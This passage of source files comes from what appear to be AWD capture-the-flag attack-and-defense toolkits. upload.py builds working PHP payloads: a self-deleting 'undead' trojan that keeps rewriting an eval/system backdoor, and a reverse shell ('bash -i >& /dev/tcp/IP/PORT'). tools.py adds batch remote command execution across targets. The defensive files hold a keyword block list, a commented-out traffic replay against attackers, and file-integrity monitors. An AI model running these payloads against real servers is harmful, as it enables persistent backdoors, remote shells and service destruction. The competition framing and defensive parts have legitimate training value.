 95 | 		try:
 96 | 			data = {password:"system('"+command+"');"}
 97 | 			r = requests.post(address,data=data)
 98 | 			if r.text != '':
 99 | 				print address,":"
100 | 				print r.text
101 | 				print "*******************************************************" 
102 | 		except:
103 | 			print "[-]Rce Failed."
104 | 			print "*******************************************************"


--------------------------------------------------------------------------------
/awdphpspear/upload.py:
--------------------------------------------------------------------------------
  1 | import requests
  2 | import os
  3 | 
  4 | def trojan_implant(address,webshell,trojan,password):
  5 | 	payload = ''
  6 | 	payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file='
  7 | 	payload += "'"
  8 | 	payload += trojan
  9 | 	payload += "'"
 10 | 	payload += ';$code='
 11 | 	payload += "'"
 12 | 	payload += '<?php @eval($_POST[a]);@system($_POST[b]); ?>'
 13 | 	payload += "'"
 14 | 	payload += ';while(1){file_put_contents($file,$code);usleep(5000);}'
 15 | 	data = {password:payload}
 16 | 	try:
 17 | 		r = requests.get(address+webshell)
 18 | 		print address+webshell,"[+]Webshell Works Well."
 19 | 	except:
 20 | 		print address+webshell,"[-]Webshell Failed"
 21 | 	try:
 22 | 		r = requests.post(address+webshell,data=data,timeout=1)
 23 | 		if r.status_code == 200:
 24 | 			r = requests.get(address+trojan)
 25 | 			if r.status_code == 200:
 26 | 				print "[+]Implant Succeed."
 27 | 				print "[+]Trojan Content:",r.text
 28 | 				print "*******************************************************"
 29 | 			else:
 30 | 				print "[-]Implant Failed."
 31 | 				print "*******************************************************" 
 32 | 	except:
 33 | 		r = requests.get(address+trojan)
 34 | 		if r.status_code == 200:
 35 | 			print "[+]Implant Succeed."
 36 | 			print "[-]Trojan Content:",r.text
 37 | 			print "*******************************************************" 
 38 | 		else:
 39 | 			print "[-]Implant Failed."
 40 | 			print "*******************************************************" 
 41 | 			
 42 | def trojan_implant_memory(address,webshell,trojan,ip,port,password):
 43 | 	payload = ''
 44 | 	payload += '$code = "<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);'
 45 | 	payload += ''
 46 | 	payload += "while(1){@system('bash -i >& /dev/tcp/"
 47 | 	payload += ip
 48 | 	payload += "/"
 49 | 	payload += str(port)
 50 | 	payload += ''' 0>&1');};";'''
 51 | 	payload += '$file = '
 52 | 	payload += '"'
 53 | 	payload += trojan
 54 | 	payload += '";'
 55 | 	payload += 'file_put_contents($file,$code);'
 56 | 	data = {password:payload}
 57 | 	try:
 58 | 		r = requests.get(address+webshell)
 59 | 		print address+webshell,"[+]Webshell Works Well."
 60 | 	except:
 61 | 		print address+webshell,"[-]Webshell Failed."
 62 | 	try:
 63 | 		r = requests.post(address+webshell,data=data,timeout=1)
 64 | 		if r.status_code == 200:
 65 | 			r = requests.get(address+trojan,timeout=1)
 66 | 			print "[+]Implant Succeed."
 67 | 			print "[+]Trojan Content:",r.text
 68 | 	except:
 69 | 		r = requests.get(address+trojan,timeout=1)
 70 | 		print "[+]Implant Succeed."
 71 | 	print 'nc -lvvp '+str(port)+' To Connect.'
 72 | 	
 73 | def file_implant(address,webshell,name,data,password):
 74 | 	payload = ''
 75 | 	payload += '$file='
 76 | 	payload += "'"
 77 | 	payload += name
 78 | 	payload += "';"
 79 | 	payload += '$code='
 80 | 	payload += "'"
 81 | 	payload += data
 82 | 	payload += "';"
 83 | 	payload += 'file_put_contents($file,$code);'
 84 | 	file_data = {password:payload}
 85 | 	try:
 86 | 		r = requests.get(address+webshell)
 87 | 		print address,"[+]Webshell Works Well."
 88 | 	except:
 89 | 		print address,"[-]Webshell Failed"
 90 | 	try:
 91 | 		r = requests.post(address+webshell,data=file_data,timeout=1)
 92 | 		if r.status_code == 200:
 93 | 			r = requests.get(address+name)
 94 | 			if r.status_code == 200:
 95 | 				print "[+]Implant Succeed."
 96 | 				print "[+]Content:",r.text
 97 | 				print "*******************************************************"
 98 | 	except:
 99 | 		r = requests.get(address+name)
100 | 		if r.status_code == 200:
101 | 			print "[+]Implant Succeed."
102 | 			print "[+]Content:",r.text
103 | 			print "*******************************************************" 
104 | 		else:
105 | 			print "[-]Implant Failed."
106 | 			print "*******************************************************" 
107 | 
108 | def check(address):
109 | 	try:
110 | 		r =requests.get(address)
111 | 		if r.status_code == 200 :
112 | 			print address,"[+]Living."
113 | 			print "*******************************************************" 
114 | 			return 1
115 | 		else:
116 | 			print address,"[-]Dead."
117 | 			print "*******************************************************"
118 | 			return 0
119 | 	except:
120 | 		print address,"Dead."
121 | 		print "*******************************************************"
122 | 		return 0


--------------------------------------------------------------------------------
/AWD_Auto_Defend_Framework/log.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 	//By ZacharyZcR
  3 | 	error_reporting(0);
  4 | 	//Monitor part
  5 | 	//--------------Parameters Edit--------------
  6 | 	$FILE_Fisrt_Parameter="pic";
  7 | 	//-------------------------------------------
  8 | 	//-------------------------------------------
  9 | 	if (!is_dir('/var/www/html/log/')){
 10 | 		mkdir('/var/www/html/log/',0777);
 11 | 		chmod('/var/www/html/log/',0777);
 12 | 	}
 13 | 	date_default_timezone_set('Asia/Shanghai');
 14 | 	$ip = $_SERVER["REMOTE_ADDR"];
 15 | 	$agent    = $_SERVER["HTTP_USER_AGENT"];
 16 | 	$filename = $_SERVER['PHP_SELF'];
 17 | 	$parameter= $_SERVER["QUERY_STRING"];
 18 | 	$cookie   = $_SERVER["HTTP_COOKIE"];
 19 | 	$accept   = $_SERVER['HTTP_ACCEPT'];
 20 | 	$method   = $_SERVER['REQUEST_METHOD']; 
 21 | 	$time     = date('Y-m-d H:i:s',time());
 22 | 	$Dport    = $_SERVER["SERVER_PORT"];
 23 | 	$Aport    = $_SERVER ["REMOTE_PORT"];
 24 | 	$payload  = file_get_contents('php://input');
 25 | 	$name=$_FILES[$FILE_Fisrt_Parameter]['name'];
 26 | 	$size=$_FILES[$FILE_Fisrt_Parameter]['size'];
 27 | 	$type=$_FILES[$FILE_Fisrt_Parameter]['type'];
 28 | 	$tmp_name=$_FILES[$FILE_Fisrt_Parameter]['tmp_name'];
 29 | 	$file_content=file_get_contents($_FILES[$FILE_Fisrt_Parameter]['tmp_name']);
 30 | 	$logname = '/var/www/html/log/'.$ip.'.txt';
 31 | 	$success = 'Attack Success!'."\r\n";
 32 | 	$fail = 'Attack Fail!'."\r\n";
 33 | 	$threaten_list = array("select","union","insert","alter","from","where","and","or","order","group","master","exec","|",".","+","*","[","]",",","?",":","'","flag","password","base64","cat","<?php","eval","assert");
 34 | 	$banner = '********************************************'."\r\n";
 35 | 	$warning = 'Warning.Uploading File!'."\r\n";
 36 | 	
 37 | 	$log_time = 'Time：'.$time."\r\n";
 38 | 	$log_ip = 'IP：'.$ip."\r\n";
 39 | 	$log_address = 'Address and parameter：'.$filename.'?'.$parameter."\r\n";
 40 | 	$log_UA = 'User agent：'.$agent."\r\n";
 41 | 	$log_cookie ='Cookie：'.$cookie."\r\n";
 42 | 	$log_accept ='Accept：'.$accept."\r\n";
 43 | 	$log_method ='Method：'.$method."\r\n";
 44 | 	$log_port ='Attack port：'.$Aport.' Denfense port：'.$Dport."\r\n";
 45 | 	$log_payload = 'Payload：'.$payload."\r\n";
 46 | 	$log_file_name = 'File name：'.$name."\r\n";
 47 | 	$log_file_size = 'File size：'.$size."\r\n";
 48 | 	$log_file_type = 'File type：'.$type."\r\n";
 49 | 	$log_file_tmp_name = 'File tmp name：'.$tmp_name."\r\n";
 50 | 	$log_file_content = 'File content:'.$file_content."\r\n";
 51 | 	
 52 | 	$dlog = fopen($logname, "a");
 53 | 	fwrite($dlog, $log_time);
 54 | 	fwrite($dlog, $log_ip);
 55 | 	fwrite($dlog, $log_port);
 56 | 	fwrite($dlog, $log_method);
 57 | 	fwrite($dlog, $log_address);
 58 | 	fwrite($dlog, $log_UA);
 59 | 	fwrite($dlog, $log_cookie);
 60 | 	fwrite($dlog, $log_accept);
 61 | 	fwrite($dlog, $log_payload);
 62 | 	if ($name != ''){
 63 | 		fwrite($dlog, $warning);
 64 | 		fwrite($dlog, $log_file_name);
 65 | 		fwrite($dlog, $log_file_size);
 66 | 		fwrite($dlog, $log_file_type);
 67 | 		fwrite($dlog, $log_file_tmp_name);
 68 | 		fwrite($dlog, $log_file_content);
 69 | 	};
 70 | 	fwrite($dlog, $banner);
 71 | 	fclose($dlog);
 72 | 	//Why must I explain to you ?
 73 | 	
 74 | 	//Rebound part 
 75 | 	//Don't be attacked forever.
 76 | 	//Show them their weapons' power!
 77 | 	//----------------------------------------
 78 | 	//$target = "";
 79 | 	//----------------------------------------
 80 | 	/*if ($method == "GET"){
 81 | 		$ch = curl_init();
 82 | 		curl_setopt($ch,CURLOPT_URL,$target);
 83 | 		curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
 84 | 		curl_setopt($ch,CURLOPT_HEADER,0);
 85 | 		curl_setopt($ch,CURLOPT_USERAGENT,$agent);
 86 | 		curl_setopt($ch,CURLOPT_COOKIE,$cookie);
 87 | 		$output = curl_exec($ch);
 88 | 		curl_close($ch);
 89 | 	
 90 | 		$dlog = fopen($logname, "a");
 91 | 		if($output === FALSE ){
 92 | 				fwrite($dlog, curl_error($rb));
 93 | 				fwrite($dlog, $fail);
 94 | 				fwrite($dlog, $banner);
 95 | 			}
 96 | 			else {
 97 | 				fwrite($dlog, $success);
 98 | 				fwrite($dlog, $banner);
 99 | 			}
100 | 			fclose($dlog);
101 | 	}
102 | 	if ($method == "POST"){
103 | 		$ch = curl_init();
104 | 		curl_setopt($ch,CURLOPT_URL,$target);
105 | 		curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
106 | 		curl_setopt($ch,CURLOPT_HEADER,0);
107 | 		curl_setopt($ch,CURLOPT_USERAGENT,$agent);
108 | 		curl_setopt($ch,CURLOPT_COOKIE,$cookie);
109 | 		curl_setopt($ch,CURLOPT_POSTFIELDS,$payload);
110 | 		$output = curl_exec($ch);
111 | 		curl_close($ch);
112 | 	
113 | 		$dlog = fopen($logname, "a");
114 | 		if($output === FALSE ){
115 | 				fwrite($dlog, curl_error($rb));
116 | 				fwrite($dlog, $fail);
117 | 				fwrite($dlog, $banner);
118 | 			}
119 | 			else {
120 | 				fwrite($dlog, $success);
121 | 				fwrite($dlog, $banner);
122 | 			}
123 | 			fclose($dlog);
124 | 	}*/
125 | 	//Firewall part
126 | 	for ($i=0;$i<=count($threaten_list);$i++){
127 | 		if (strpos($parameter,$threaten_list[$i])!== false || strpos($payload,$threaten_list[$i])!== false){
128 | 			$alog = fopen("/var/www/html/log/attack_log.txt", "a");
129 | 			fwrite($alog, $log_time);
130 | 			fwrite($alog, $log_ip);
131 | 			fwrite($alog, $log_method);
132 | 			fwrite($alog, $log_address);
133 | 			fwrite($alog, $log_payload);
134 | 			fwrite($alog, $banner);
135 | 			fclose($alog);
136 | 			sleep(15);
137 | 			die("Go out hacker!");
138 | 		};
139 | 	};
140 | 	
141 | 	
142 | ?>
143 | 


--------------------------------------------------------------------------------
/awdphpspear/tools.py:
--------------------------------------------------------------------------------
  1 | # -*- coding:utf-8 -*-
  2 | from files import *
  3 | from request import *
  4 | from shell import *
  5 | from upload import *
  6 | from attack import *
  7 | from protect import *
  8 | 
  9 | def config():
 10 | 	ip_list = []
 11 | 	print "[+]Attack Config."
 12 | 	print "[+]Target Address Select."
 13 | 	ip_num = raw_input('How Num:')
 14 | 	for i in range(int(ip_num)):
 15 | 		ip = raw_input('Target:')
 16 | 		ip_list.append(ip)
 17 | 	for i in range(len(ip_list)):
 18 | 		write_txt('target.txt',ip_list[i])
 19 | 	print "[+]Target Address Select Succeed."
 20 | 	
 21 | def start():
 22 | 	while 1:
 23 | 		print "*******************************************************"
 24 | 		print "****************A*****W**W**W**DDD*********************"
 25 | 		print "***************A*A****W**W**W**D**D********************"
 26 | 		print "**************AAAAA****W*W*W***D**D********************"
 27 | 		print "*************A*****A****W*W****DDD*********************"
 28 | 		print "***********************************By:ZacharyZcR*******"
 29 | 		print "***********************************Version:0.1.7*******"
 30 | 		print "***********************************Copyright:Acmesec***"
 31 | 		print "*******************************************************"
 32 | 		print "[+]Function list:"
 33 | 		print "1.Help"
 34 | 		print "2.Help_CN"
 35 | 		print "3.Attack_Module"
 36 | 		print "4.Defense_Module"
 37 | 		func = raw_input('Num:')
 38 | 		if func == '1':
 39 | 			print '''This is an AWD tool platform integrating attack and defense.
 40 | With simple configuration, you can start to use various functions.
 41 | Function list:
 42 | files:
 43 | 	read_array(target_file)
 44 | 	read_var(target_file)
 45 | 	write_txt(target_file,content)
 46 | 	dir_tree(startpath)
 47 | 	get_php_list(startpath)
 48 | shell:
 49 | 	shell_gen()
 50 | 	rce(address,password,method)
 51 | upload:
 52 | 	trojan_implant(address,webshell,trojan,password)
 53 | 	trojan_implant_memory(address,webshell,trojan,ip,port,password)
 54 | 	file_implant(address,webshell,name,data,password)
 55 | 	check(address)
 56 | attack:
 57 | 	confuse(ip = [],php_list = [])
 58 | protect:
 59 | 	get_file_md5(filename)
 60 | 	file_md5_build(startpath)
 61 | 	file_md5_defense()
 62 | 	file_md5_check()
 63 | 	file_log_add()
 64 | 	file_backup()
 65 | 	file_backup_remove()'''
 66 | 		if func == '2':
 67 | 			print '''这是一个集成了攻击和防御的AWD工具平台。
 68 | 通过简单的配置你就可以开始使用各项功能了。
 69 | 功能列表:
 70 | files:
 71 | 	read_array(target_file)
 72 | 	read_var(target_file)
 73 | 	write_txt(target_file,content)
 74 | 	dir_tree(startpath)
 75 | 	get_php_list(startpath)
 76 | shell:
 77 | 	shell_gen()
 78 | 	rce(address,password,method)
 79 | upload:
 80 | 	trojan_implant(address,webshell,trojan,password)
 81 | 	trojan_implant_memory(address,webshell,trojan,ip,port,password)
 82 | 	file_implant(address,webshell,name,data,password)
 83 | 	check(address)
 84 | attack:
 85 | 	confuse(ip = [],php_list = [])
 86 | protect:
 87 | 	get_file_md5(filename)
 88 | 	file_md5_build(startpath)
 89 | 	file_md5_defense()
 90 | 	file_md5_check()
 91 | 	file_log_add()
 92 | 	file_backup()
 93 | 	file_backup_remove()'''
 94 | 		if func == '3':
 95 | 			print "[+]Attack module loaded"
 96 | 			print "1.Webshell Generate"
 97 | 			print "2.Attack Config"
 98 | 			print "3.Undead Trojan Implant"
 99 | 			print "4.Memory Trojan Implant(Rebound Shell)"
100 | 			print "5.Attack Traffic Confusion"
101 | 			print "6.Single Remote Command Execution"
102 | 			print "7.Batch Remote Command Execution(Cat Flag/Destroy Service/End This AWD)"
103 | 			_choose = raw_input('Num:')
104 | 			if _choose == '1':
105 | 				shell_gen()
106 | 			if _choose == '2':
107 | 				config()
108 | 			if _choose == '3':
109 | 				webshell = raw_input('Input Target URL Without Host:')
110 | 				trojan = raw_input('Input Trojan Name:')
111 | 				passwd = raw_input('Input The Webshell Password:')
112 | 				target_list = []
113 | 				target_list = read_array('target.txt')
114 | 				for i in range(len(target_list)):
115 | 					trojan_implant(target_list[i],webshell,trojan,passwd)
116 | 			if _choose == '4':
117 | 				webshell = raw_input('Input Target Webshell URL Without Host:')
118 | 				trojan = raw_input('Input Trojan Name:')
119 | 				passwd = raw_input('Input The Webshell Password:')
120 | 				ip = raw_input('Input Your IP:')
121 | 				port = input('Input Your Port:')
122 | 				target_list = read_array('target.txt')
123 | 				for i in range(len(target_list)):
124 | 					trojan_implant_memory(target_list[i],webshell,trojan,ip,port,passwd)
125 | 					port += 1
126 | 			if _choose == '5':
127 | 				target_list = read_array('target.txt')
128 | 				file_list = get_php_list('./')
129 | 				try:
130 | 					for i in range(len(target_list)):
131 | 						confuse(target_list,file_list)
132 | 				except:
133 | 					print '[-]Error.'
134 | 			if _choose == '6':
135 | 				target_list = read_array('target.txt')
136 | 				try:
137 | 					for i in range(len(target_list)):
138 | 						print str(i)+' '+target_list[i]
139 | 					sign = input('Num:')
140 | 					webshell = raw_input('Input Target URL Without Host:')
141 | 					passwd = raw_input('Input The Webshell Password:')
142 | 					method = raw_input('Input Connect Method(1.Get 2.Post):')
143 | 					if method == '1':
144 | 						method = 'get'
145 | 					if method == '2':
146 | 						method = 'post'
147 | 					rce(target_list[sign]+webshell,passwd,method)
148 | 				except:
149 | 					print '[-]Error.'
150 | 			if _choose == '7':
151 | 				target_list = read_array('target.txt')
152 | 				webshell = raw_input('Input Target URL Without Host:')
153 | 				passwd = raw_input('Input The Webshell Password:')
154 | 				method = raw_input('Input Connect Method(1.Get 2.Post):')
155 | 				if method == '1':
156 | 					method = 'get'
157 | 				if method == '2':
158 | 					method = 'post'
159 | 				while 1:
160 | 					try:
161 | 						command = raw_input('Command(Input stop to exit):')
162 | 						if command == 'stop':
163 | 							break
164 | 						for i in range(len(target_list)):
165 | 							batch_rce(target_list[i]+webshell,passwd,method,command)
166 | 					except:
167 | 						print '[-]Error.'
168 | 		if func == '4':
169 | 			print "[+]Defense module loaded"
170 | 			print "1.Build dir tree."
171 | 			print "2.Start file protect module."
172 | 			print "3.Start file monitor module."
173 | 			print "4.File backup."
174 | 			print "5.File backup remove."
175 | 			print "6.PHP file add log."
176 | 			_choose = raw_input('Num:')
177 | 			if _choose == '1':
178 | 				dir_tree('./')
179 | 			if _choose == '2':
180 | 				file_md5_defense()
181 | 			if _choose == '3':
182 | 				file_md5_check()
183 | 			if _choose == '4':
184 | 				file_backup()
185 | 			if _choose == '5':
186 | 				file_backup_remove()
187 | 			if _choose == '6':
188 | 				file_log_add()


--------------------------------------------------------------------------------
/awdphpspear/protect.py:
--------------------------------------------------------------------------------
  1 | # -*- coding:utf-8 -*-
  2 | import os
  3 | import hashlib
  4 | import time 
  5 | import shutil
  6 | 
  7 | def get_file_md5(filename):
  8 | 	m = hashlib.md5()
  9 | 	with open(filename,'rb') as fobj:
 10 | 		while True:
 11 | 			data = fobj.read(4096)
 12 | 			if not data:
 13 | 				break
 14 | 			m.update(data)
 15 | 	return m.hexdigest()
 16 | 	
 17 | def file_md5_build(startpath):
 18 | 	global md5_list
 19 | 	global file_list
 20 | 	global dir_list
 21 | 	global root
 22 | 	md5_list = []
 23 | 	file_list = []
 24 | 	dir_list = []
 25 | 	for root,dirs,files in os.walk(startpath,topdown=True):
 26 | 		for d in dirs:
 27 | 			dir_list.append(root+'/'+d)
 28 | 		for f in files:
 29 | 			if f[-4:] == '.txt':
 30 | 				continue
 31 | 			file_list.append(root+'/'+f)
 32 | 			md5_list.append(get_file_md5(root+'/'+f))
 33 | 			
 34 | def file_md5_defense():
 35 | 	file_backup()
 36 | 	global root
 37 | 	file_md5_build('./')
 38 | 	old_list = []
 39 | 	old_dir_list = []
 40 | 	new_list = []
 41 | 	new_dir_list = []
 42 | 	check_list = []
 43 | 	old_file_list = []
 44 | 	new_file_list = []
 45 | 	check_file_list = []
 46 | 	old_file_list = file_list[:]
 47 | 	old_list = md5_list[:]
 48 | 	old_dir_list = dir_list[:]
 49 | 	while (1):
 50 | 		print "*******************************************************"
 51 | 		print '[+]The old file total:',len(old_list)
 52 | 		print '[+]The old dir total:',len(old_dir_list)
 53 | 		print "*******************************************************"
 54 | 		check_list = old_list[:]
 55 | 		check_file_list = old_file_list[:]
 56 | 		file_md5_build('./')
 57 | 		new_list = md5_list[:]
 58 | 		new_file_list = file_list[:]
 59 | 		new_dir_list = dir_list[:]
 60 | 		sign2 = 0
 61 | 		
 62 | 		for i in range(len(old_dir_list)):
 63 | 			sign3 = 0
 64 | 			for j in range(len(new_dir_list)):
 65 | 				if (old_dir_list[i] == new_dir_list[j]):
 66 | 					sign3 = 1
 67 | 					break
 68 | 			if sign3 == 0:
 69 | 				sign3 = 1
 70 | 				print old_dir_list[i].replace('./',''),'Disappear!'
 71 | 				try:
 72 | 					shutil.copytree(tgt+old_dir_list[i].replace('./','/'),old_dir_list[i])
 73 | 					print "[+]Repaired."
 74 | 				except:
 75 | 					print "[-]No such dir."
 76 | 		for i in range(len(new_list)):
 77 | 			sign = 0
 78 | 			for j in range(len(old_list)):
 79 | 				if (new_list[i] == old_list[j] and new_file_list[i] == old_file_list[j]):
 80 | 					check_list[j] = '0'
 81 | 					sign = 1
 82 | 					break
 83 | 			if sign == 0:
 84 | 				sign2 = 1
 85 | 				print new_file_list[i].replace('./',''),'Add or Changed!'
 86 | 				try:
 87 | 					os.remove(new_file_list[i])
 88 | 					shutil.copyfile(tgt+new_file_list[i].replace('./','/'),new_file_list[i])
 89 | 					print "[+]Repaired."
 90 | 				except:
 91 | 					print "[-]No such file."
 92 | 		for i in range(len(check_list)):
 93 | 			if check_list[i] != '0' and sign2 != 1:
 94 | 				print check_file_list[i].replace('./',''),'Disappear!'
 95 | 				sign2 = 0
 96 | 				try:
 97 | 					shutil.copyfile(tgt+check_file_list[i].replace('./','/'),check_file_list[i])
 98 | 					print "[+]Repaired."
 99 | 				except:
100 | 					print "[-]No such file."
101 | 				
102 | 		print "*******************************************************"
103 | 		print '[+]Total file:',len(new_list)
104 | 		print '[+]Total dir:',len(new_dir_list)
105 | 		print "*******************************************************"
106 | 		time.sleep(5)
107 | 
108 | def file_md5_check():
109 | 	file_backup()
110 | 	global root
111 | 	file_md5_build('./')
112 | 	old_list = []
113 | 	old_dir_list = []
114 | 	new_list = []
115 | 	new_dir_list = []
116 | 	check_list = []
117 | 	old_file_list = []
118 | 	new_file_list = []
119 | 	check_file_list = []
120 | 	old_file_list = file_list[:]
121 | 	old_list = md5_list[:]
122 | 	old_dir_list = dir_list[:]
123 | 	while (1):
124 | 		print "*******************************************************"
125 | 		print '[+]The old file total:',len(old_list)
126 | 		print '[+]The old dir total:',len(old_dir_list)
127 | 		print "*******************************************************"
128 | 		check_list = old_list[:]
129 | 		check_file_list = old_file_list[:]
130 | 		file_md5_build('./')
131 | 		new_list = md5_list[:]
132 | 		new_file_list = file_list[:]
133 | 		new_dir_list = dir_list[:]
134 | 		sign2 = 0
135 | 		
136 | 		for i in range(len(old_dir_list)):
137 | 			sign3 = 0
138 | 			for j in range(len(new_dir_list)):
139 | 				if (old_dir_list[i] == new_dir_list[j]):
140 | 					sign3 = 1
141 | 					break
142 | 			if sign3 == 0:
143 | 				sign3 = 1
144 | 				print old_dir_list[i].replace('./',''),'Disappear!'
145 | 		for i in range(len(new_list)):
146 | 			sign = 0
147 | 			for j in range(len(old_list)):
148 | 				if (new_list[i] == old_list[j] and new_file_list[i] == old_file_list[j]):
149 | 					check_list[j] = '0'
150 | 					sign = 1
151 | 					break
152 | 			if sign == 0:
153 | 				sign2 = 1
154 | 				print new_file_list[i].replace('./',''),'Add or Changed!'
155 | 		for i in range(len(check_list)):
156 | 			if check_list[i] != '0' and sign2 != 1:
157 | 				print check_file_list[i].replace('./',''),'Disappear!'
158 | 				sign2 = 0
159 | 		print "*******************************************************"
160 | 		print '[+]Total file:',len(new_list)
161 | 		print '[+]Total dir:',len(new_dir_list)
162 | 		print "*******************************************************"
163 | 		time.sleep(5)
164 | 
165 | def file_log_add():
166 | 	php_list=[]
167 | 	for root,dirs,files in os.walk('./',topdown=True):
168 | 		for f in files:
169 | 			if f[-4:] == '.php':
170 | 				php_list.append(root+'/'+f)
171 | 
172 | 	for i in range(len(php_list)):
173 | 		php_list[i] = php_list[i].replace('//','/')
174 | 		print php_list[i]
175 | 	print '[+]Total PHP file:',len(php_list)
176 | 	confirm = raw_input("Confirm Open Log Monitoring. 1 or 0:")
177 | 	if confirm == '1':
178 | 		print "*******************************************************"
179 | 		for i in range(len(php_list)):
180 | 			level_dir = 0
181 | 			for j in range(len(php_list[i])):
182 | 				if php_list[i][j] == '/':
183 | 					level_dir += 1
184 | 			lines = open(php_list[i],"r").readlines()
185 | 			length = len(lines)-1
186 | 			for j in range(length):
187 | 				if '<?php' in lines[j]:
188 | 					lines[j]=lines[j].replace('<?php','<?php\nrequire_once("./'+'../'*(level_dir-1)+'log.php");')
189 | 			open(php_list[i],'w').writelines(lines)
190 | 		print "[+]Log monitoring turned on."
191 | 
192 | def file_backup():
193 | 	src = './'
194 | 	try:
195 | 		shutil.copytree(src,tgt)
196 | 		print "[+]File backup succeed."
197 | 	except:
198 | 		print "[-]File backup fail.Maybe it exists."
199 | 		
200 | def file_backup_remove():
201 | 	try:
202 | 		shutil.rmtree(tgt)
203 | 		print "[+]File backup remove succeed."
204 | 	except:
205 | 		print "[-]File backup remove fail.Maybe it doesn't exist."
206 | 
207 | global tgt
208 | tgt = './backup'


--------------------------------------------------------------------------------
/AWD_Auto_Defend_Framework/File_Protect.py:
--------------------------------------------------------------------------------
  1 | # -*- coding:utf-8 -*-
  2 | import os
  3 | import hashlib
  4 | import time 
  5 | import shutil
  6 | 
  7 | def file_tree(startpath):
  8 | 	for root,dirs,files in os.walk(startpath,topdown=True):
  9 | 		level = root.replace(startpath,'').count(os.sep)
 10 | 		dir_indent = "|---" * (level-1) + "|---"
 11 | 		file_indent = "|---" * level + "|---"
 12 | 		if not level:
 13 | 			print root.replace(startpath,'')
 14 | 		else:
 15 | 			print dir_indent+os.path.basename(root)
 16 | 		for f in files:
 17 | 			print file_indent+f
 18 | 			
 19 | def get_file_md5(filename):
 20 | 	m = hashlib.md5()
 21 | 	with open(filename,'rb') as fobj:
 22 | 		while True:
 23 | 			data = fobj.read(4096)
 24 | 			if not data:
 25 | 				break
 26 | 			m.update(data)
 27 | 	return m.hexdigest()
 28 | 	
 29 | def file_md5_build(startpath):
 30 | 	global md5_list
 31 | 	global file_list
 32 | 	global dir_list
 33 | 	global root
 34 | 	md5_list = []
 35 | 	file_list = []
 36 | 	dir_list = []
 37 | 	for root,dirs,files in os.walk(startpath,topdown=True):
 38 | 		for d in dirs:
 39 | 			dir_list.append(root+'/'+d)
 40 | 		for f in files:
 41 | 			if f[-4:] == '.txt':
 42 | 				continue
 43 | 			file_list.append(root+'/'+f)
 44 | 			md5_list.append(get_file_md5(root+'/'+f))
 45 | 	
 46 | def file_md5_defense():
 47 | 	file_backup()
 48 | 	global root
 49 | 	file_md5_build('./')
 50 | 	old_list = []
 51 | 	old_dir_list = []
 52 | 	new_list = []
 53 | 	new_dir_list = []
 54 | 	check_list = []
 55 | 	old_file_list = []
 56 | 	new_file_list = []
 57 | 	check_file_list = []
 58 | 	old_file_list = file_list[:]
 59 | 	old_list = md5_list[:]
 60 | 	old_dir_list = dir_list[:]
 61 | 	while (1):
 62 | 		print "*******************************************************"
 63 | 		print 'The old file total:',len(old_list)
 64 | 		print 'The old dir total:',len(old_dir_list)
 65 | 		print "*******************************************************"
 66 | 		check_list = old_list[:]
 67 | 		check_file_list = old_file_list[:]
 68 | 		file_md5_build('./')
 69 | 		new_list = md5_list[:]
 70 | 		new_file_list = file_list[:]
 71 | 		new_dir_list = dir_list[:]
 72 | 		sign2 = 0
 73 | 		
 74 | 		for i in range(len(old_dir_list)):
 75 | 			sign3 = 0
 76 | 			for j in range(len(new_dir_list)):
 77 | 				if (old_dir_list[i] == new_dir_list[j]):
 78 | 					sign3 = 1
 79 | 					break
 80 | 			if sign3 == 0:
 81 | 				sign3 = 1
 82 | 				print old_dir_list[i].replace('./',''),'Disappear!'
 83 | 				try:
 84 | 					shutil.copytree(tgt+old_dir_list[i].replace('./','/'),old_dir_list[i])
 85 | 					print "Repaired."
 86 | 				except:
 87 | 					print "No such dir."
 88 | 		for i in range(len(new_list)):
 89 | 			sign = 0
 90 | 			for j in range(len(old_list)):
 91 | 				if (new_list[i] == old_list[j] and new_file_list[i] == old_file_list[j]):
 92 | 					check_list[j] = '0'
 93 | 					sign = 1
 94 | 					break
 95 | 			if sign == 0:
 96 | 				sign2 = 1
 97 | 				print new_file_list[i].replace('./',''),'Add or Changed!'
 98 | 				os.remove(new_file_list[i])
 99 | 				try:
100 | 					shutil.copyfile(tgt+new_file_list[i].replace('./','/'),new_file_list[i])
101 | 					print "Repaired."
102 | 				except:
103 | 					print "No such file."
104 | 		for i in range(len(check_list)):
105 | 			if check_list[i] != '0' and sign2 != 1:
106 | 				print check_file_list[i].replace('./',''),'Disappear!'
107 | 				sign2 = 0
108 | 				try:
109 | 					shutil.copyfile(tgt+check_file_list[i].replace('./','/'),check_file_list[i])
110 | 					print "Repaired."
111 | 				except:
112 | 					print "No such file."
113 | 				
114 | 		print "*******************************************************"
115 | 		print 'Total file:',len(new_list)
116 | 		print 'Total dir:',len(new_dir_list)
117 | 		print "*******************************************************"
118 | 		time.sleep(5)
119 | 
120 | def file_md5_check():
121 | 	file_backup()
122 | 	global root
123 | 	file_md5_build('./')
124 | 	old_list = []
125 | 	old_dir_list = []
126 | 	new_list = []
127 | 	new_dir_list = []
128 | 	check_list = []
129 | 	old_file_list = []
130 | 	new_file_list = []
131 | 	check_file_list = []
132 | 	old_file_list = file_list[:]
133 | 	old_list = md5_list[:]
134 | 	old_dir_list = dir_list[:]
135 | 	while (1):
136 | 		print "*******************************************************"
137 | 		print 'The old file total:',len(old_list)
138 | 		print 'The old dir total:',len(old_dir_list)
139 | 		print "*******************************************************"
140 | 		check_list = old_list[:]
141 | 		check_file_list = old_file_list[:]
142 | 		file_md5_build('./')
143 | 		new_list = md5_list[:]
144 | 		new_file_list = file_list[:]
145 | 		new_dir_list = dir_list[:]
146 | 		sign2 = 0
147 | 		
148 | 		for i in range(len(old_dir_list)):
149 | 			sign3 = 0
150 | 			for j in range(len(new_dir_list)):
151 | 				if (old_dir_list[i] == new_dir_list[j]):
152 | 					sign3 = 1
153 | 					break
154 | 			if sign3 == 0:
155 | 				sign3 = 1
156 | 				print old_dir_list[i].replace('./',''),'Disappear!'
157 | 		for i in range(len(new_list)):
158 | 			sign = 0
159 | 			for j in range(len(old_list)):
160 | 				if (new_list[i] == old_list[j] and new_file_list[i] == old_file_list[j]):
161 | 					check_list[j] = '0'
162 | 					sign = 1
163 | 					break
164 | 			if sign == 0:
165 | 				sign2 = 1
166 | 				print new_file_list[i].replace('./',''),'Add or Changed!'
167 | 		for i in range(len(check_list)):
